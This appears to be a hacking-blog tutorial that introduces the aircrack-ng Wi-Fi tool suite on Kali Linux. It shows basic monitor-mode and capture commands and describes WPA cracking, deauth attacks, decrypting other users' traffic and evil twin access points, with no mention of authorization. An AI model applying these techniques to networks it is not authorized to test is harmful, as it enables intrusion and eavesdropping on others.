Understanding the Aircrack-Ng Suite of Wi-Fi Hacking Tools


Welcome back Script Kiddiens !

Note: Note: This is not a hacking tutorial. We are only going to learn the Aircrack-Ng Suite of #WiFi Hacking Tools.

Today we'll be talking about the world's best Wi-Fi hacking software, aircrack-ng. We'll be using aircrack-ng in nearly all of the subsequent hacks, so I think it's wise to start with some basics on what is included and how to use everything. We'll be using Kali Linux. We'll be using Kali in most of our hacks so it's good to install Kali before you get started.

Aircrack-ng is not a single tool, but rather a suite of tools for manipulating and cracking WiFi networks. Within this suite, there is a tool called aircrack for cracking passwords, but to get to the cracking we need to do several steps using other tools. In addition, aircrack-ng is capable of doing DOS attacks as well rogue access points, caffe latte, evil twin, and many others.
Note : The "-ng" stands for new generation, as aircrack-ng replaces an older suite called aircrack that is no longer supported.

SO LET'S GET STARTED:

First check that Kali recognizes WiFi adapter. We can do this within any Linux system by typing:
                                                                $ iwconfig


1. Airmon-ng
The first tool we will look at and need in nearly ever in WiFi hack is airmon-ng, which converts our wireless card into a promiscuous mode wireless card. Yes, that means that our wireless card will hookup with anyone!
Well, that's almost correct. When our network card is in promiscuous mode, it means that it can see and receive all network traffic. Generally, network cards will only receive packets intended for them (as determined by the MAC address of the NIC), but with airmon-ng, it will receive all wireless traffic intended for us or not.
We can start this tool by typing airmon-ng, the action (start/stop), and then the interface (mon0):
                                                             
                                                                $ airmon-ng start wlan0


Airmon-ng responds with some key information on our wireless adapter including the chipset and driver. Most importantly, note that it has changed the designation for our wireless adapter from wlan0 to mon0.

2. Airodump-ng
Now that we have set out wireless card to monitor mode, we have to capture packets of our specification. So, the next tool in the aircrack-ng suite that we will need is airodump-ng. It's particularly useful in password cracking. We activate this tool by typing the airodump-ng command and the renamed monitor interface (mon0):

                                                                 $ airodump-ng mon0

Airodump-ng will displays all of the APs (access points) within range with their BSSID (MAC address), their power, the number of beacon frames, the number of data packets, the channel, the speed, the encryption method, the type of cipher used, the authentication method used, and finally, the ESSID. For our purposes of hacking WiFi, the most important fields will be the BSSID and the channel.

3. Aircrack-ng
Aircrack-ng is the primary application with the aircrack-ng suite, which is used for password cracking. It's capable of using statistical techniques to crack WEP and dictionary cracks for WPA and WPA2 after capturing the WPA handshake.

4. Aireplay-ng
Aireplay-ng is another powerful tool in our aircrack-ng arsenal, and it can be used to generate or accelerate traffic on the AP. This can be especially useful in attacks like a deauth attack that bumps everyone off the access point, WEP and WPA2 password attacks, as well as ARP injection and replay attacks. Aireplay-ng can obtain packets from two sources: A live stream of packets, or A pre-captured pcap file (The pcap file is the standard file type associated with packet capture tools like libpcap and winpcap. If you've ever used Wireshark, you've most likely worked with pcap files.) These include deauth, fake deauth, interactive, arpreplay (necessary for fast WEP cracking), chopchop (a form of statistical technique for WEP packet decrypting without cracking the password), fragment, caffe latte (attacking the client side), and others. These four tools in the aircrack-ng suite are our Wi-Fi hacking work horses. We'll use each of these in nearly every Wi-Fi hack. Some of our more hack-specific tools include airdecap-ng, airtun-ng, airolib-ng and airbase-ng. Let's take a brief look at each of these. 


5. Airdecap-ng
Airdecap-ng enables us to decrypt wireless traffic once we have cracked the key. In other words, once we have the key on the wireless access point, not only can we use the bandwidth on the access point, but with airdecap-ng we can decrypt everyone's traffic on the AP and watch everything they're doing (the key is used for both access and for encryption).

6. Airtun-ng
Airtun-ng is a virtual tunnel interface creator. We can use airtun-ng to set up an IDS on the wireless traffic to detect malicious or other traffic on the wireless access point. So, if we're looking to get an alert of a particular type of traffic (see my tutorial on creating a PRISM-like spy tool), we can use airtun-ng to set up a virtual tunnel that connects to an IDS like Snort to send us alerts.

7. Airolib-ng
Airolib-ng stores or manages ESSID's (the name of the access point) and password lists that will help speed up WPA/WPA2 password cracking.

8. Airbase-ng
Airbase-ng enables us to turn our laptop and wireless card into an AP. This can be especially useful when doing a rogue access point or evil twin attacks. Basically, airbase-ng allows us to attack the clients, rather than the AP, and encourages the clients to associate with us rather than the real AP. 

THAT'S IT FOR NOW.
 #HAPPY #HACKING

Leave a comment